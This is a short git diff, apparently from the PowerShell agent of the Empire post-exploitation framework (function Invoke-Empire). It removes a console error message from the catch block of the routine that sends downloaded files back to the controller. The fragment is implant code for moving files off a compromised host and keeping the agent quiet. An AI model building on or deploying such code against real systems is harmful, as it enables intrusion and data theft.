remove output
parent
7d711d4e77
commit
8c1927887a
|
@ -733,7 +733,6 @@ function Invoke-Empire {
|
||||||
Encode-Packet -type 40 -data "[*] File download of $path completed"
|
Encode-Packet -type 40 -data "[*] File download of $path completed"
|
||||||
}
|
}
|
||||||
catch {
|
catch {
|
||||||
write-host "Error: $_"
|
|
||||||
Encode-Packet -type 0 -data "file does not exist or cannot be accessed"
|
Encode-Packet -type 0 -data "file does not exist or cannot be accessed"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue